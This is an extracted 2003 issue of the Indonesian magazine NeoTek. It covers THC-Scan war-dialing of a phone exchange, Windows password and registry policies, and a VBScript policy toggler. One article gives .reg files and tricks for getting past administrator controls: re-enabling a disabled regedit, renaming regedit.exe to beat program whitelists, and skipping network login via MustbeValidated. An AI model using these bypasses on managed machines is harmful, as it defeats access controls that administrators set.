Pemanfaatan war dialer dapat ditingkat-kan lagi dengan otomatisasi pengirimanperintah ke modem dengan cara meng-gunakan batch file yang sesuai.

Pembuatan batch file memerlukan sedi-kit konsep programming. Mungkin disini bagi pemakai yang terbiasa denganWindows dan bukan programmer akanmendapat sedikit kesulitan.Khusus untuk THC-Scan (dan beberapautilitasnya), kadang-kadang tidak dapatberjalan di versi-versi mesin tertentu(tampil runtime error).

Apabila ini terjadi, gunakan source codePascal yang disediakan dan coba jalan-kan rercompile source code itu agar

berjalan pada mesin anda. Cara laincoba jalankan software yang sudah jadi(ada dalam thc-bin.zip) pada dua jenismesin yang memang bebeda kernelnya:

• Windows 95/98/ME atau• Windows NT/2K/XP

Bermain war dialer dengan program ber-

basis DOS memang bukan pekerjaanyang terlalu nyaman.Tetapi begitulahcara kerja hacker pada jamannya danprogram-program ini masih relevandengan masa kini, mengingat masihbanyak akses Internet dengan dial-up.

Atau anda mau mencoba versi windowssaja? Coba Telix for Windows yang di-sediakan juga pada CD NeoTek kali ini.

USER FRIENDLY Konfigurasi THC-Scan dengan men-

 jalankan ts-cfg.exe. THC-Scanmerupakan war dialer berbasisDOS yang user friendly. Setiap opsipada layar konfigurasi dilengkapidengan penjelasan mengenai apa

 yang perlu dilakukan.

MODEM CONFIGKonfigurasi pertama, MODEMCONFIG pada dasarnya hanyamenetapkan untuk menggunakanport COM nomor berapa. Yang laintidak perlu diubah.

1 2

Semua fitur yang ada pada ToneLoc ada pula di THC-Scan plus yang lain lagi 

LOG DAN MISCELLANEOUS

Pada LOGFILES anda dapat mene-tapkan berbagai macam log filedengan berbagai karakteristik:carrier, fax, tone, voice, busy, country,atau custom. Pada MISCELLANEOUS

anda menetapkan setting pentingmengenai time delay selama dandi antara dial.

4

KELENGKAPAN THC-SCAN

Zip file thc-ts20.zip berisi pengenalan danmanual singkat THC-Scan (Readme.doc)serta beberapa file zip lain:• ts-bin.zip binary fi les THC-Scan

mencakup pula tools untuk manipulasi .dat files

• ts-doc.zip manual lengkap• ts-misc.zip intro dan netscan.bat untuk 

distributed dialing (dialmenggunakan beberapakomputer sekaligus)

• ts-src.zp source code THC-Scan; dapatrecompile menggunakanPascal compiler apabila adamasalah menjalankannya dikomputer anda.

MENJALANKAN THC-SCAN

Semua command line option yang berlakupada ToneLoc berlaku pula pada THC-Scan,dengan pengecualian /C (alternate config-uration file) dan /T (only report tones).

 Yang menarik, THC-Scan dapat menerimanomor-nomor untuk ditelepon dari file

dengan simbol @ untuk menspesifikasifileteks tersebut:

MODEM RESPONSESDisini yang menarik. Anda dapatmenetapkan program eksternalapa yang dijalankan terhadap res-pons modem tertentu. Anda bisatetapkan misalnya HyperTerminalataupun PC Anywhere. Progam iniperlu dispesifikasi dulu dalammenu EXECUTE CONFIG.

3

C:\>thc-scan.exe @fileteks.txt

 THC-Scan mempunyai kemampuan meng-output command line yang diperlukan kemasing-masing komputer pada modempool. Kemampuan distributed dialing inimenggunakan netscan.bat.

Untuk itu sebelumnya perlu ditetapkan duluenvironment variable CLIENT untuk mene-tapkan client number dari komputer yangsedang dipakai. Untuk itu sebelumnya andaharus mengedit variabel-variabel CLIENTS(jamak) dan DEEP pada file netscan.bat.

 THC-Scan segera di-launch setelah bat fileini dijalankan, jadi pastikan bahwa path danfile ts.cfg sudah benar.

Contoh full exchange 031-555-0000 sampai031-555-9999 dipecah dial-nya ke tigakomputer:

C:\>set CLIENT=1 && netscan.bat 031555C:\>thc-scan 1-031555 /M:031555 R:0-3333 /QC:\>set CLIENT=2 && netscan.bat 031555C:\>thc-scan 2-031555 /M:031555 R:3334-6666 /Q

C:\>set CLIENT=3 && netscan.bat 031555C:\>thc-scan 3-031555 /M:031555 R:6667-9999 /Q

Page 19: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 19/50

NeoTekno

18 NeoTek Mei/Jun 2003

ELANJUTKAN PEMBAHASAN MENGENAI POLICY EDITOR:Pelindung MS Window di NeoTek II/10 Juli 2002,yang dilengkapi dengan bahan local security policy

kali ini dibahas lebih detail, agar rekan-rekan neoteker dapatbenar-benar mempergunakan Local Security Settings iniyang dahulu diatur melalui Policy Editor.

Password Policy 

Gambar pertama menunjukkan isi dari Password Policy.Hati-hati, ini dapat menyebabkan local account passwordyang ada sedikit mempunyai karakter. Di window panesebelah kanan dapat dibaca sebagai berikut (sebagaistandard default value):

• Enforce password history(default: 0 [passwords remembered])

Jika kita ingin keamanan PC kita terjamin, passwordyang pernah kita miliki akan dimasukkan ke PH(Password History), misalnya kita ganti dengan angka2, maka password berikutnya yang terbaru tidak bolehsama dengan yang tercantum di PH.

Contoh: password pertama: antonali, password kedua:alianton, maka password ketiga harus lain misalnya

alianakjalanan. Secara berurutan maka dua passwordterakhir akan di-save di dalam PH (hati-hati *.DATtidak boleh dihapus, karena akan menyebabkan bluescreen) sewaktu password ketiga diisikan maka pass-word pertama akan dapat dipergunakan kembali.

antonali > alianton > [new password] < alianakjalanan

alianton > alianakjalanan > [new password] < (boleh mempergunakan antonali lagi)

• Maximum password age(default: 42 [days])

Memberitahukan bahwa password yang kita milikiakan berlaku hanya selama 42 hari. Ini sebenarnyasudah normal dan mirip dengan password validitydari Novell (jika rekan-rekan Neoteker mengenalNovell Network System)

• Minimum password age(default: 0 [days])

Merupakan kebalikan dari kriteria sebelumnya. Jikanilai ini kita ubah menjadi 2, maka jika kita memilikipassword baru di system ini, maka password tersebutharus kita pergunakan selama 2 hari dan selama itu

tidak akan diperbolehkan mengganti password, kecualipolicy ini diubah kembali ke nilai asalnya.

Yang sering kita temui adalah bahwa password yangkita input terkadang harus memenuhi persyaratan:semuanya huruf, semua angka, atau gabungan semua-nya dan terdiri dari 6 atau 8 ketikan tombol abjad dikeyboard kita. Minimum password length policy iniyang mengatur itu. Pada Win9x/Me sering kali kitadapat masuk tanpa mengetikkan password atau jugahanya dengan menekan Cancel. Itu dikarenakan per-tama ketidakadaannya pengaturan keamanan local(local security policy) dan memang default-nya adalahangka 0.

Password must meet complexity requirements(default: disabled)

PPoledit:oledit:PPassword Password Policyolicy

Policy Editor adalah cara sistematis untuk melindungi sistem operasi Windows.

Software Poledit tersedia untuk Windows 95, Windows 98 (hanya dua features:

Local Policies dan Public Policies)

atau pada Windows XP dan W2000 (lebih lengkap).Andreas Jiman membahasnya untuk anda.

M

Gambar 1 . Password Policy 

TOPIK BAHASAN WINDOWS SECURITY KALI INI MENCAKUP

hal-hal yang berhubungan dengan security policy padaWindows serta cara penerapannya lewat registry, yangditulis oleh beberapa orang yang dapat anda hubungiapabila ada pertanyaan lebih lanjut. Sebagai pelengkapdisajikan juga tool untuk memeriksa patch yang sudah

terpasang pada Windows untuk memastikankeamanannya.

• Poledit: Password Policy 18

• Policy pada Windows 98 20

• Policy On/Off dengan VBScript 22

• Bypass Larangan RegEdit 24

• MS Baseline Security Analyzer 26

Secara tidak langsung, terdapat pula artikel-artikel DelphiWorkshop yang membahas cara membuat tweaking toolsendiri menggunakan Borland Delphi 7 Personal Editionyang disediakan dalam CD NeoTek bulan ini.

•Borland Delphi 7: Personal Edition Full Version 28

• Delphi Tweaking Tool 30

WWIINNDDOOWWS SS SEECCUURRIITTYY

Page 20: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 20/50

NeoTekno

Mei/Jun 2003 NeoTek 19

Merupakan criteria yang dihubungkan dengan server.Jika kita enabled status ini, maka secara langsungpolicy dari PC kita yang terhubung dengan Networkber-Server Windows (minimal Win2k Server) akanmencari tahu kompleksitas password creation yangterdapat di Server, dan meng-implementasikannya kePC lokal (diharapkan berhati-hati, tidak disaran meng-gunakannya jika merasa ragu-ragu dengan kapasitas

dan karakter dari Server yang dimiliki)• Store password using reversible encryption for all

users in domain(default : disabled)

Merupakan policy yang berbahaya. Disarankan tetapmembiarkan defaultnya, karena ini juga merupakansumber jalan masuknya intruder dari sisi lain sepertiinternet. Jika Certification Service di server rekan-rekan tidak ter-install dengan baik, hal ini juga akanmenyebabkan terjadinya password open line (POL)yang merupakan jalan mudah bagi intruder untukmendapatkan password windows rekan-rekan.

Redefinisi Local Security Policy Sebelum mengubah dan mendefinisikan ulang local secu-rity policy, disarankan untuk meng-ekspor registryWindows terlebih dahulu.

Jalankan Registry Editor (regedit.exe, bukan reged32.exe)dengan memilih Start > Run dan ketikkan regedit. Akanmuncul jendela tampilan Registry Editor. Highlight MyComputer (Gambar 2).

Klik File > Export…, berikutnya akan ditampilkan satuwindow dialog seperti Gambar 3. Langkah terakhir adalahmemberikan nama pada file registry (berisi semua konfi-gurasi PC kita berikut semua policy dan class system-nya)yang akan di-save.

Jika ada yang error, kita hanya membutuhkan jalan untuk

masuk ke Interface OS kita lalu tinggal dobel klik fileregistry kita tadi, dan restart saja PC kita, untuk mengem-balikannya ke posisi awal. (Perhatian: Jangan mengguna-kan fasilitas System Recovery dari Third Party maupundari Microsoft sendiri yang kurang teruji kehandalannya)

Hati-hati pula, untuk pengguna Win2Ksp3 dan WinXP, jangan sampai pada instalasi software apapun sampaimenghapus permanen Folder -System Volume Information

Account Lockout Policy 

Persah salah memasukkan PIN sanmpai tiga kali di ATMdan setelah itu kartu ATM kita tertelan? Ini adalah contohsehari-hari dari account lockout policy.Kita dapat kembali

ke tema Policy sebelumnya. Kita bahas langsung AccountLockout Policy yang mempunyai 3 karakter. Account.

Lockout Policy adalah batas yang menjaga proses userlogin ke OS lokal kita. Aktivasinya hanya pada waktu OSyang kita miliki mempunyai struktur policy yang samadengan policy server. Win2K berpasangan dengan Win2KServer (Advanced).

Selain itu fungsi batasan ini akan disabled sama sekali aliastidak dapat diubah. Policy inilah yang akan membuataccount di lokal dikunci alias dimatikan atau dideaktifkan.Bila ada orang yang bermaksud menggunakan PC kitadan berusaha masuk dengan cara mengisi login user namedan passwordnya, maka account kita akan dideaktifkansetelah kesalahan login beberapa kali. Ini fungsi yang jugadigunakan di setiap ATM (automated teller machine).

Bagaimana? Rekan-rekan sudah lebih mengetahui ten-tang tool yang satu ini? Nantikan saja edisi berikutnyayang akan membahas lebih banyak lagi. Neotek akanmengulasnya hingga selesai.

Gambar 2 . Jalankan regedit.exe

Gambar 3 . Nama tersendiri untuk setiap file registry 

Gambar 5 . Masih banyak policies yang dapat dipelajari.

Gambar 4 . Account lockout policy 

Page 21: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 21/50

NeoTekno

20 NeoTek Mei/Jun 2003

OLICY (KEBIJAKAN) SELAIN DITERAPKAN INSTANSI peme-rintah dan swasta, ternyata juga dapat diterapkanpada program aplikasi. Pada artikel ini, penulis akan

membahas mengenai policy pada sistem operasi MicrosoftWindows 98. Untuk itu,Anda memerlukan registry editor(RegEdit) dan jangan lupa untuk mem-backup registryAnda untuk menghindari hal-hal yang tidak diinginkan.

Pada suatu hari, PC milik teman penulis terkena virusmakro. Setelah virus makro tersebut berhasil dibersihkan,

ternyata menu "Run" dan "Shut Down" masih tetaptidak tampak pada "Start Menu".

Sebagai teman, tentunya penulis berusaha membantunyadengan mencari informasi, dimana salah satu rujukannyaadalah MSDN. Setelah melakukan pencarian (search) de-ngan beberapa kata-kunci, akhirnya penulis mendapat-kannya. Ternyata, hal ini berkaitan dengan policy(kebijakan) untuk "Explorer" atau terdapat pada key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Iseng-iseng, penulis melakukan pencarian (search) dengankata-kunci "NoRun" (untuk menghilangkan menu "Run")untuk semua file yang berada pada direktori: "C:\Windows".

Hasilnya cukup mengejutkan, karena ada beberapa file yangmemanfaatkannya. Setelah penulis buka file-file tersebutsatu per satu, ternyata file shell32.dll memuat informasiterbanyak yang berkaitan dengan policy (kebijakan) untukExplorer, karena memuat lebih dari 50 nama, yaitu:

Dalam percobaan, ternyata beberapa nama ternyata tidakmemerlukan value (nilai) dan beberapa nama dapat langsungdilihat efeknya tanpa memerlukan restart.

Sebagai contoh, penulis akan membahas untuk namaNoDrives. Jalankan RegEdit, lalu masuk ke key:

HKEY_CURRENT_USER\Software\Microsof t\Windows\CurrentVersion\Policies\Explorer

Pada menu Edit, pilihlah New > Binary Value. Ganti name

New Value #1 dengan NoDrives. Anda tidak perlu mema-sukkan value (nilai) untuk nama ini.

PPolicy pada Wolicy pada Windoindows 98ws 98Policy pada Windows 98 dapat diutak-atik (tweak) dengan Registry Editor khususnya pada segmenregistry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ 

Fitrianto Halim ([email protected]) membahasnya untuk anda.

P

WWIINNDDOOWWS SS SEECCUURRIITTYY

Gambar 1 . Membuat binary value baru dengan nama NoDrive

• ActiveDesktop• ClassicShell• ClearRecentDocsOnExit• EnforceShellExtensionSecurity• ForceCopyACLWithFile• LinkResolveIgnoreLinkInfo• MyDocsOnNet• NoActiveDesktop• NoActiveDesktopChanges• NoAddingComponents•

NoAddPrinter• NoChangeStartMenu• NoChangingWallPaper• NoClose• NoCloseDragDropBands• NoClosingComponents• NoCommonGroups• NoComponents• NoCustomizeWebView• NoDeletePrinter• NoDeletingComponents• NoDesktop• NoDriveAutoRun• NoDrives• NoDriveTypeAutoRun• NoEditingComponents• NoFavoritesMenu• NoFileMenu• NoFileUrl• NoFind

• NoFolderOptions• NoForgetSoftwareUpdate• NoHTMLWallPaper• NoInternetIcon• NoLogoff • NoNetConnectDisconnect• NoNetHood• NoMovingBands• NoMSAppLogo5ChannelNotify• NoPrinterTabs•

NoRealMode• NoRecentDocsHistory• NoRecentDocsMenu• NoResolveSearch• NoResolveTrack• NoRun• NoSaveSettings• NoSetActiveDesktop• NoSetFolders• NoSetTaskbar• NoSettingsWizards• NoStartBanner• NoStartMenuSubFolders• NoTrayContextMenu• NoViewContextMenu• NoWebMenu• NoWindowsUpdate• RestrictRun• WinOldApp

Page 22: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 22/50

NeoTekno

Mei/Jun 2003 NeoTek 21

Pada Gambar 2 dan Gambar 3,Anda dapat melihat perbeda-annya pada aplikasi Windows Explorer (Anda bisa langsungmelihat hasilnya tanpa memerlukan restart).

Sebagai catatan, penulis telah meng-install Internet Explorer6.0 (karena IE yang ada berpengaruh pada kemampuan Win-dows Explorer, seperti langsung menampilkan drive C: jikatersedia IE 6.0).

Ingat, nama NoDrives hanya menghilangkan tampilandrive-drive pada aplikasi (terutama untuk aplikasi-aplikasiMicrosoft ataupun yang memanfaatkan shell32.dll).Walaupun demikian, Anda tetap dapat memanfaatkan drive-drive tersebut dengan cara mengetikannya. Sedangkanuntuk aplikasi-aplikasi under DOS tidak ada masalah.

Telaah Sendiri Policies yang LainKarena penulis masih penasaran, kini penulis melakukanpencarian (search) dengan kata-kunci "policies" untuksemua file yang berada pada direktori: "C:\Windows".

Dari hasil pengamatan, ternyata selain policy (kebijakan)untuk "Explorer", ada pula untuk "Network", "System","Peer" dan mungkin masih ada yang lain... ?

Policy (kebijakan) terdapat pada file-file dengan ekstensi:

• CPL (Control Panel)• DLL• EXE

• OCX (ActiveX)• dan lain-lain.

Disable RegeditSalah satu yang menarik adalah Anda juga dapat me-non-aktifkan program RegEdit, yaitu pada key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

(buat key System seandainya belum ada) dengan namaDisableRegistryTools dengan nilai 1 (tipenya DWORD).Untuk lebih jelasnya,Anda dapat melihat Gambar 4.

Jika Anda khawatir, copy terlebih dahulu program RegEdit.exedengan nama lain (misal: _RegEdit.EXE), lalu dengan pro-gram hex editor buka file hasil copy tersebut dan cari kata-

kunci DisableRegistryTool. Ganti DisableRegistryToolsdengan kata lain (misalkan: DisableRegisterTools). Kini,orang lain tidak dapat menjalankan program RegEdit, tetapiAnda tetap dapat mengedit registry dengan cara menggu-nakan program hasil copy yang telah diubah tersebut.

Gambar 5 menunjukkan penolakan ketika menjalankanprogram RegEdit yang telah dinonaktifkan.

PenutupJika Anda perhatikan, Microsoft sepertinya agak ceroboh,sehingga informasi vital seperti policy (kebijakan) dapatdidapatkan dengan mudah, yaitu cukup dengan melakukanpencarian (search) dengan kata-kunci "policies".

Penulis berharap, tulisan ini dapat bermanfaat untuk me-ningkatkan security (keamanan) PC Anda disamping ten-tunya dapat mengatasi seandainya terkena virus yangmemanfaatkan policy (kebijakan) tersebut.

Selamat mencoba...

Gambar 2 . Sebelum penambahan binary value NoDrive

Gambar 3 . Setelah penambahan binary value NoDrive

Gambar 5 . Kini orang lain tidak bisa mengutak-atik registry anda

Gambar 4 . Disable Registry Tool 

Page 23: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 23/50

NeoTekno

22 NeoTek Mei/Jun 2003

EBELUMNYA KITA TELAH BELAJAR MENDAPATKAN POLICY

yang terdapat pada aplikasi-aplikasi pada sistem ope-rasi Windows 98. Kali ini kita membuat aplikasi

sederhana untuk mengaktifkan atau menonaktifkan policy.

Agar lebih mudah dipahami dan dapat dicoba dalam wak-tu singkat, penulis membuatnya dalam bentuk file HTMLyang di dalamnya berisi script-script VBScript.

Aktifkan Dulu Windows Scripting Host

Bagian terpenting adalah Windows Scripting Host (WSH),karena digunakan untuk penulisan registry dalam aplikasiini. Selain VBScript, Anda sebetulnya dapat memanfaatkanJScript (JavaScript dari Microsoft) untuk membuat aplikasiini. Dalam aplikasi ini, kita harus memasukkan value (nilai)dari setiap nama, karena WSH tidak memiliki kemampu-an untuk memasukkan nama tanpa nilai.

Dari hasil coba-coba dan mencari informasi di MSDN,akhirnya penulis mendapatkan infomasi nilai-nilai yangdibutuhkan untuk tiap-tiap nama, baik untuk mengaktif-kan maupun untuk menonaktifkannya. Sebetulnya, kitadapat menghapus nama tersebut untuk mengaktifkannyakembali, tetapi pada aplikasi ini mempergunakan carapemberian suatu nilai pada nama tersebut.

Yang menarik adalah nilai-nilai untuk nama NoDrivesakan berpengaruh pada drive-drive mana yang ditampil-kan atau tidak ditampilkan (pada Windows Explorer ber-arti yang dapat diakses atau tidak dapat diakses).

Karena aplikasi ini memanfaatkan WSH, maka Anda ha-rus mengetahui apakah WSH telah ter-install atau tidakpada PC yang akan Anda pergunakan. Caranya mudah:• Pada Control Panel pilihlah Add/Remove Programs• Pada tab Windows Setup pilihlah Accessories lalu klik

tombol Details...

• Pada bagian Components: cari Windows Scripting Hostdengan melakukan scroll ke bawah. Tanda "tick"menandakan bahwa Windows Scripting Host telah ter-install.

• Jika belum ter-install, beri tanda "tick" lalu tekan OK

Untuk lebih jelasnya, lihat Gambar 1, 2, dan 3.

PPolicy On/Off dengan VBScriptolicy On/Off dengan VBScriptSetelah memahami cara manual mengubah policy pada Windows 98 melalui registry,kali ini Fitrianto Halim ([email protected]) menyajikan programming sederhana

menggunakan VBScript untuk melakukan perubahan pada registry.

S

WWIINNDDOOWWS SS SEECCUURRIITTYY

Gambar 1. Pada Control Panel pilih Add/Remove Program Gambar 2 dan 3. Pilih tab Windows Setup > Accessories > WSH

Page 24: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 24/50

NeoTekno

Mei/Jun 2003 NeoTek 23

Tweaking Tool Berbasis HTML

Sekarang, kita coba aplikasi ini yang penulis beri namaMySecure.htm. (file MySecure.htm disediakan dalam CDNeoTek atau bisa dibuat sendiri dengan text editor)

Cara mencoba aplikasi ini sebagai berikut:

• Buka file MySecure.htm dengan Internet Explorer.• Pilihlah status yang Anda inginkan, apakah "Aktif"

atau "Non-aktif" yang bersesuaian dengan fungsinya.Setelah itu, klik tombol Ganti.

• Karena kitamenggunakansebuah kon-trol ActiveXdari WindowsScriptingHost, makaakan muncul peringatan. Klik tombol Yes untuk meng-

gunakannya.• Sebuah page (halaman) baru akan muncul untuk menam-

pilkan informasi perubahan status yang telah Anda pilih.

Beberapa efek ada yang tidak memerlukan restart, namunada pula yang memerlukan restart. Namun, terkadangpada suatu PC tidak memerlukan restart, tetapi pada PClainnya memerlukan restart. Oleh karena itu, ada baiknyaAnda tetap me-restart PC yang Anda pergunakan setelahmenjalankan aplikasi ini. Bagi yang menonaktifkan menuShut Down, jalan satu-satunya untuk melakukan restart

adalah dengan menekan kombinasi tombol: Ctrl-Alt-Del.

Penutup

Mudah-mudahan artikel ini dapat meningkatkan keamananPC Anda dari tangan-tangan jahil.

Gambar 9. Tampilan Windows Explorer setelah menu-menu dinonaktifkan.

Gambar 5. File MySecure.htm apabila dibuka menggunakan browser.

Gambar 8. Menu Shut Down di-nonaktifkan. Akibatnya untuk me-restart anda harus menggunakan kombinasi Ctrl-Alt-Del 

<HTML><BODY><form name=Form1 method=post><table>

<tr><td><b>Fungsi</b></td><td><b>Aktif</b></td><td><b>Non-aktif</b></td></tr><tr><td>Drive</td> <td><input type=radio name=Check1checked></td><td><input type=radio name=Check1></td></tr><tr><td>Menu Documents</td><td><input type=radio name=Check2checked></td><td><input type=radio name=Check2></td></tr><tr><td>Menu Favorites</td><td><input type=radio name=Check3checked></td><td><input type=radio name=Check3></td></tr><tr><td>Menu File</td> <td><input type=radio name=Check4checked></td><td><input type=radio name=Check4></td></tr><tr><td>Menu Find</td> <td><input type=radio name=Check5checked></td><td><input type=radio name=Check5></td></tr><tr><td>Menu Log Off</td> <td><input type=radio name=Check6checked></td><td><input type=radio name=Check6></td></tr><tr><td>Menu Run</td> <td><input type=radio name=Check7checked></td><td><input type=radio name=Check7></td></tr><tr><td>Menu Settings</td> <td><input type=radio name=Check8checked></td><td><input type=radio name=Check8></td></tr><tr><td>Menu Shut Down</td><td><input type=radio name=Check9checked></td><td><input type=radio name=Check9></td></tr>

<tr><td>RegEdit</td> <td><input type=radio name=Check0checked></td><td><input type=radio name=Check0></td></tr><tr><td colspan=3 align=center><input type=button value="Ganti"name=Button1></td></tr></table></form><script language="VBS"><!--Dim l1,l2,l3,l4,l5,l6,l7,l8,l9,l0Dim s1,s2,s3Dim myErr,WsShell

Sub Button1_onClickInitialize()If myErr Then

Fail()Else

Work()Success()

End IfEnd Sub

Function Initialize()On Error Resume NextErr.ClearmyErr=False

Gambar 4. Bagian awal dari file MySecure.htm seaktu dibaca dengan text  processor seperti WordPad. File lengkapnyaada di CD NeoTek bulan ini.

Gambar 6 dan 7. MySecure.htm berisi VBScript yang menggunakan salah satu kontrol ActiveX padaWindows Scripting Host.

Page 25: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 25/50

NeoTekno

24 NeoTek Mei/Jun 2003

EBELUMNYA FITRIANTO HALIM MEMBAHAS CARA men-disable regedit.exe, tetapi bagaimana bila yangmen-disable itu orang lainj, sehingga kita tidak

bisa menggunakan regedit? Ketika kita ingin mengeditregistry namun tidak bisa menggunakan regedit.exe ka-rena sistem komputer kita telah di-protect oleh admindan ketika menjalankan regedit kita mendapatkan pesanregistry editing has been disabled by your system ad-ministrator, di komputer kita.

Cara membaypassnya adalah dengan membuat file .regyang berisi key sebagai berikut:REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools"=dword:00000000

Tulis key diatas mengunakan notepad lalu simpan meng-

gunakan ekstensi .reg dengan nama file sesuai denganyang kita kehendaki (misalnya bypass.reg).

Terlihat bahwa file bypass.reg kini tersimpan di disk seba-gai suatu registry file, yang untuk menjalankannya, ting-gal double click saja.

Akan tampil pesan bahwa informasi yang ada dalam fileini akan ditambahkan pada registry (dalam hal ini yangakan ditambahlkan adalah registry entry yang mengaktif-kan kembali regedit.exe)

Klik OK dan akan tampil pesan berikutnya bahwa infor-

masi yang ada pada file bypass.reg telah berhasil dimasuk-kan ke dalam registry.

Namun bisa saja admin sengaja menghilangkan regedit.exesebagai tindakan pengamanan, jika ini terjadi, kita tinggalmeng-copy regedit.exe dari computer lain dan meng-copy-nya ke komputer yang hendak kita lihat file registry nya.

Atau mungkin admin melakukan pengamanan denganmengijinkan program tertentu dan melarang programtertentu untuk dijalankan. Jika itu terjadi, maka kita ha-nya perlu mengubah nama file regedit.exe menjadi namalain. Misal kita hanya boleh menjalankan notepad.exedan tidak diijinkan mejalakan regedit.exe, maka kita ting-

gal me-rename file regedit.exe kita menjadi notepad.exedan kita sudah bisa melihat isi file registry-nya.

Bypass Larangan RegEditBypass Larangan RegEditRegedit merupakan tool yang ampuh untuk mengutak-atik sistem operasi Windows, tetapi juga bisamerusak apabila tidak digunakan pada tempatnya. Tidak heran bila system administrator sering kali

men-disable fasilitas ini. Putut Indrayana ([email protected]) membahas cara mengatasinya.

S

WWIINNDDOOWWS SS SEECCUURRIITTYY

Gambar 2 . Sebelum penambahan binary value NoDrive

Page 26: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 26/50

NeoTekno

Mei/Jun 2003 NeoTek 25

Cara Menjebol Login dan Password Komputer yangTerhubung ke Jaringan

Jika komputer kita terhubung ke jaringan dan saat per-tama komputer dinyalakan kita mendapati message boxyang meminta login id dan password, maka untuk dapatmenjebolnya kita perlu membuat .reg file sebagai berikut:REGEDIT4

[HKEY_LOCAL_MACHINE\Network\logon]"MustbeValidated"=dword:00000000

tulis key di atas dengan notepad dan simpan denganekstesi .reg. Khusus untuk menjalankan file registry iniharus melalui Real DOS Mode.

Cara menggunakannya

1. Boot komputer anda, sebelum masuk ke Windows te-kan F8 dan pilih "real dos mode" dari option yang ada.

2. Copy file registry yang telah kita buat ke c:

3. Jalankan file registry yang telah kita buat, misalkanfile registry-nya diberi nama test.reg , maka untukmenjalakannya, pada DOS prompt ketik:

C:\> regedit test.reglalu tekan enter.

4. Restart komputer anda.

File registry yang telah kita buat akan mengijinkan kitauntuk login ke komputer yang akan kita gunakan tanpaperlu memasukan username dan password, dan hanyadengan menekan tombol Cancel kita sudah bisa login.

Melumpuhkan Poledit

Poledit merupakan andalan Windows dalam mengaman-kan sistemnya dari orang-orang yang tidak berkepenting-an dan tidak diinginkan untuk mengakses Windows kita.Kali ini kita akan mencoba melumpuhkannya agar kitadapat mengakses Windows dengan leluasa

Poledit sesunguhnya program sederhana yang menulis-kan key-key registry ke system registry Windows untukmembatasi akses atau program tertentu. Dan poledit inimenuliskan key registry-nya pada:

HKEY_CURRENT_USER/Sofware/Microsoft/Windows/CurrentVersion/Policies/Explorer

dan meletakan key-key sebagai berikut:• NoClose• NoDesktop

• NoDrives• NoFavoritesMenu• NoFind

• NoFolderOptions• NoLogoff • NoRecentDocsMenu• NoRun• NoSaveSettings• NoSetActiveDesktop• NoSetFolders• NoSetTaskbar• NoViewContextMenu• NoFile•

EditLevel• AddPrinter• DeletePrinter• NoDriveTypeAutoRun• NoNetHood• NoStartBanner

Pada key tersebut poledit akan membuat nilai dword 1untuk pengaktifan registrynya dan 0 untuk me-nonaktf-kan key registry tersebut.

Contoh:

Buat file registry sebagai berikut untuk menonaktifkanpilihan Run pada Windows Start > Run (suatu contohpembatasan akses yang dilakukan oleh poledit.)

1. Tulis pada notepad registry key sebagai berikut:REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]"NoRun"=dword:00000001

2. Beri nama run-off.reg, dan jalankan (double click padaicon-nya).

3. Restart komputer anda dan lihat perubahannya.

Sekarang kita membuat penangkal dari file run-off.regyang telah membuat kita kehilangan fungsi Run diWindows (menjebol batasan yang dilakukan poledit)

1 Tulis pada notepad registry key sebagai berikut:REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]

"NoRun"=dword:000000002. Beri nama run-on.reg, dan jalankan (double click pada

icon-nya).

3. Restart dan lihat perubahannya.

Sekarang kita dapat kembali mengunakan fasilitas Run.

Seperti itulah pembatasan yang dilakukan poledit padasistem Windows kita

Task Sceduler

Task scheduler adalah pro-gram bawaan Windows un-tuk menjadwalkan kapan

suatu program berjalan sesuai waktu yang kita kehendakipada jam/hari/bulan yang telah kta pilih. Ada kemungkinanbahwa admin membuat agar poledit dijalankan oleh Taskscheduler untuk aktif setiap kali komputer restart, yangberarti registry akan balik ke awal setiap kali Windowsmelakukan boot ulang.

Cara penanggulangannya :

1. Double click Task scheduler yang terletak di pojokkanan bawah.

2. Dari daftar program yang ada di Task scheduler, pilihSystem policy editor

3. Lalu delete System policy editor ini

dan sekarang setiap kalibooting

kita tidak akan diganggulagi oleh poledit.

Page 27: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 27/50

NeoTekno

26 NeoTek Mei/Jun 2003

UDAH BANYAK ARTIKEL YANG MEMBAHAS CARA menem-bus keamanan dari Operating System (OS) buat-an Microsoft. Sudah banyak juga virus-virus yang

memakan korban data/file penting dalam hard disk yangmenggunakan OS dari Microsoft ini. Tapi banyak peng-guna komputer pribadi, termasuk Administrator Jaringan,enggan/tidak menyadari pentingnya untuk selalu installUpdate/Patches terbaru dari Microsoft.

Salah satu penyebabnya bisa jadi karena terlalu banyak

patch yang dikeluarkan. Sulit untuk memonitor patch baru,walaupun Microsoft sudah menyediakan fasilitas WindowsUpdate dan Auto-Update untuk otomatisasi pemilihan patchmulai dari Windows 98 sampai Windows XP.

